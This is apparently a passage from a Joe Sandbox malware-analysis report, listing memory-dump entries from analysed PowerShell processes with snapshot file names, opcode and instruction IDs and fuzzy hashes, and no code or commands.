                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2256336922.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                                                                                                                                                                                                                                      • API String ID: 0-1620291718
                                                                                                                                                                                                                                                                                      • Opcode ID: 3eea2a279b9dd9d76ca0cd9dcf1e0b5874cc72dcea7ddb226addacf26fe28661
                                                                                                                                                                                                                                                                                      • Instruction ID: 839484acd49e748f28acf543447f31a9256066befd2a0bc0fc878d1a02d164d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eea2a279b9dd9d76ca0cd9dcf1e0b5874cc72dcea7ddb226addacf26fe28661
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD15331D1EA8E5FE7A9EB2858545B5BB90EF15390F1801FED44DCB0D3EA1CA805C356
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e3db61c670c2c4ce7f59cf127ed8ff3bce66c7fb78a4e39147e4babe66944760
                                                                                                                                                                                                                                                                                      • Instruction ID: 4ba58190bc263effa57872584bd39c664c195fd9452a99227048efb6397475aa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3db61c670c2c4ce7f59cf127ed8ff3bce66c7fb78a4e39147e4babe66944760
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8451A47690DBD15FE357A738AC660E13FA0EF12B96F0901FBD0888A0E3EE185C468755
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 742368ad1a341acfaf9f82bf4baae245a48d565d88549dda5f51bbf79400caed
                                                                                                                                                                                                                                                                                      • Instruction ID: 5a8ace74cd6b3b1b223e6ac2ac1468464c64f2a96435f0d4fd91f2ae1d24ca67
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 742368ad1a341acfaf9f82bf4baae245a48d565d88549dda5f51bbf79400caed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7921623590D6C54FDB53AB344C155A8BFB0EF13290B4901EFD488CB0E7D6585849CB96
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d11805d273d069a635910efd934a1e8bb6203626266abccdcb303c4fdec3aa90
                                                                                                                                                                                                                                                                                      • Instruction ID: 5cd23da02b10a32bfaeee6f3ca652cfb6ffaf7f8dd3e136f55a409d8a9697903
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d11805d273d069a635910efd934a1e8bb6203626266abccdcb303c4fdec3aa90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0311C31A1CB489FDB5CAF5CA8066F97BE1FB65710F00412FE449C3692DB34A8568BC6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2251396222.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848dfd000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: c4cd671c52d869dc81db52b67373ced05ab0417695e9ff6643be0fa0a936d25e
                                                                                                                                                                                                                                                                                      • Instruction ID: ec7597f61d59a360d29a447bbf1398e31e75150e86468baeb435abbad57fcc50
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4cd671c52d869dc81db52b67373ced05ab0417695e9ff6643be0fa0a936d25e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6641323180EBC44FE3569B28A845A563FF0EF52324F1501EFD088CF1A3D725A84AC792
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 30b32184bb55e5cdb2ce3234e1063884ec9ea7b95516bf5ee6947a62d8010263
                                                                                                                                                                                                                                                                                      • Instruction ID: 5eccca8c1f61d971f26db19b9e14622f12282491b65f24827e34fd4241256afa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30b32184bb55e5cdb2ce3234e1063884ec9ea7b95516bf5ee6947a62d8010263
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21D73190CB4C8FDB58DF9C984A7E97BE0EB95321F04412FD449C3152D774A85ACB91
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 2aae2241f65e2a2b47564ead00f03636b48715558453b901c549227cff2dea4c
                                                                                                                                                                                                                                                                                      • Instruction ID: 2b59060db16511cee5aed95bc0c2f5ab77c1068dd2039b4f15bd50bf7c5372b7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2aae2241f65e2a2b47564ead00f03636b48715558453b901c549227cff2dea4c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E211AF3641D3C54FE717972868562D9BFA0DF03264F5C41EBC088CB0D3DA1A281B8761
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2256336922.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction ID: dc5b3f6a5b877f69ed45f2dd0bd6d1d01e761deadd50e81d1eeedeb930c9832d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A118E32B0D9198FDB59EB0CE4419F873E1EFA8761B1400BBD10AC71A2DB29EC56C785
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2256336922.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction ID: ad82f8d91b71bdcc5bbac7e4c724964ecfcfde893a6adea8a8eb89b7c7df34c8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E118E32B0C9088FDB54EB0CE4419F8B7E1EF54364B5400ABD10AC71A3DB29EC55C795
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                      • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2256336922.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction ID: c22a7a5bf575f795bf10398961241c508bb6adc3c637ba9f52bfcb0741616011
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F0B431A0C9058FD759EB0CE4044A473E0FF59360F1500BAE01DC71A3DB29EC408745
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2256336922.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction ID: 222751ec4fb05e36e8befe769d74d37b2eb345aa0d2d3dc6175970d995a203c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0B832A0CA448FD758EB0CE4448A8B3E0FF05320F0500BAE00ECB4A3DB2AEC608755
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2255574162.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                                                                                                                                                                                                      • API String ID: 0-3508309026
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                                                                                                      • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2600247971.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                                                                                                                                                                                                                      • API String ID: 0-3685135179
                                                                                                                                                                                                                                                                                      • Opcode ID: 1a9aeb3d9c859445c27a766d4bf9d5e6dc77293cf3662376849c73a102265127
                                                                                                                                                                                                                                                                                      • Instruction ID: 6df9a4d3b92ff996b4043fc28caa6be99ea84ca17df796099b636e883510ec6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a9aeb3d9c859445c27a766d4bf9d5e6dc77293cf3662376849c73a102265127
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCD15432D0EACA4FEB69EF2868551B57BE2EF15754F0802FED04DD7083EA18E8418352
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2598332609.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5b17c419e7e652800cac52c8561c07102b0f63b3115ac916b06769c341aa4859
                                                                                                                                                                                                                                                                                      • Instruction ID: 17c9545fd960a247f6635a6449389ff4e0c915847afe59c4926c0b7242068a0d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b17c419e7e652800cac52c8561c07102b0f63b3115ac916b06769c341aa4859
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9741E73190CB884FDB19DF1CAC0A6A97FE1FB56710F04416FD05983692CA65A859CBC7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2591840469.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848e1d000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 0ea16e2ef97d7807ad39b9dbbcdbe784ec0f538bc4cc74a8f7fc010a673fcfb6
                                                                                                                                                                                                                                                                                      • Instruction ID: e1da1be3e3fec1e5b5fb00140b6959dfc6d111d6a4cc1c135d4b95b1214e85cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea16e2ef97d7807ad39b9dbbcdbe784ec0f538bc4cc74a8f7fc010a673fcfb6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F41027180DBC44FD7969B38A851A523FF0FF56360B1502DFE088CB1A3DA24A846C7A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2598332609.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 17a9f2791e968b6ad27b39f67cc74f0ccfbccca2f6ce9cd3767220bf3e1861fd
                                                                                                                                                                                                                                                                                      • Instruction ID: b43ef86265d4838c1b966562348acdc2622000ccd719fd03fd0986ee047ce865
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17a9f2791e968b6ad27b39f67cc74f0ccfbccca2f6ce9cd3767220bf3e1861fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD21F77080D7888FE7099BA89C4AAF97FB4EB53321F04819BD445D71A2DA786846CB61
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2600247971.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 62e20f8fc90d9c11f477feeff66865c0c8e8ef63d9e551d862faa3c2a4f13f5e
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e07349b2b475334c062d4841b35a6ee8bffeecb8fcddc738eaae3de20d2a3f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62e20f8fc90d9c11f477feeff66865c0c8e8ef63d9e551d862faa3c2a4f13f5e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26118E32B0D9198FDB69EA0CE4419E873E1EF98761B1400BBD10AC71A3EA25EC56C785
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2600247971.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f2ce1f32bd01f46551a29d0152dab7f6c2b1e3daf0e269c37ab2a7db16c60432
                                                                                                                                                                                                                                                                                      • Instruction ID: 40fe8d20c4f9319a669c9b5e96ce2a9e171f1e17b4355b63b9bfb4b169739bbb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ce1f32bd01f46551a29d0152dab7f6c2b1e3daf0e269c37ab2a7db16c60432
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9118E32B0C9488FDB54EA0CE4419E8B7E1EF55365B5400EBD10AC7163EA25EC55C795
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2598332609.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                                                                                                                                                                                                                                      • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2598332609.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c42ce584d4430eb4bc6933b6be2a5feea8373b12f605405dc3be592e00c8f06
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0F63790CE8C4FDB82FF2C98690E87FA0FF66215B0401ABD408C7161E7224948CBC2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2600247971.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d6d5b2162c123f84aecf15e42fb139432e7bdda179aaa7241a2c6819a355cdb6
                                                                                                                                                                                                                                                                                      • Instruction ID: e5247ef82aef5edf6c0965e3477702692b4a3b344631dbc766b7c91fe8e584fd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6d5b2162c123f84aecf15e42fb139432e7bdda179aaa7241a2c6819a355cdb6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F0BE32A0CA458FDB68EB0CF4048E8B3E0EF55360B1500FAE01DC71A3EB26EC408749
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2600247971.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 247405b481dad1d2640be508a91e831435df8737ecf22d96ba79bb726e9f63fb
                                                                                                                                                                                                                                                                                      • Instruction ID: ec8e2491c8ad657f9401bc69b817af444b581e841f0833f3e0d32336073cede5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 247405b481dad1d2640be508a91e831435df8737ecf22d96ba79bb726e9f63fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CF05832A0D6858FDB68EF1CE4458A8B7E0FF45361B5500F6E14ECB0A3EB26EC548755
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000010.00000002.2598332609.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                                                                                                                                                                                                                      • API String ID: 0-1415242001
                                                                                                                                                                                                                                                                                      • Opcode ID: a48a5e8dc6c07f09c0312bb91da70bf2955af60d843af0b839b48b631d2e1ef3
                                                                                                                                                                                                                                                                                      • Instruction ID: 208ff562fc9593e1c1eac2d9eee7fc3ebff388127ed0e92e8ac16a561240a24b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a48a5e8dc6c07f09c0312bb91da70bf2955af60d843af0b839b48b631d2e1ef3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 882107736155159AC201376DB8415EE7790EF543B874552F3E218CF113DF2CA48B8A94
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2903693525.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                                                                                                                                                                                                                                      • API String ID: 0-1877043794
                                                                                                                                                                                                                                                                                      • Opcode ID: c35484bc8e0ba023d020185c3ab8e81cbe63c1a39fdef97a7d5ffc0ee275ce81
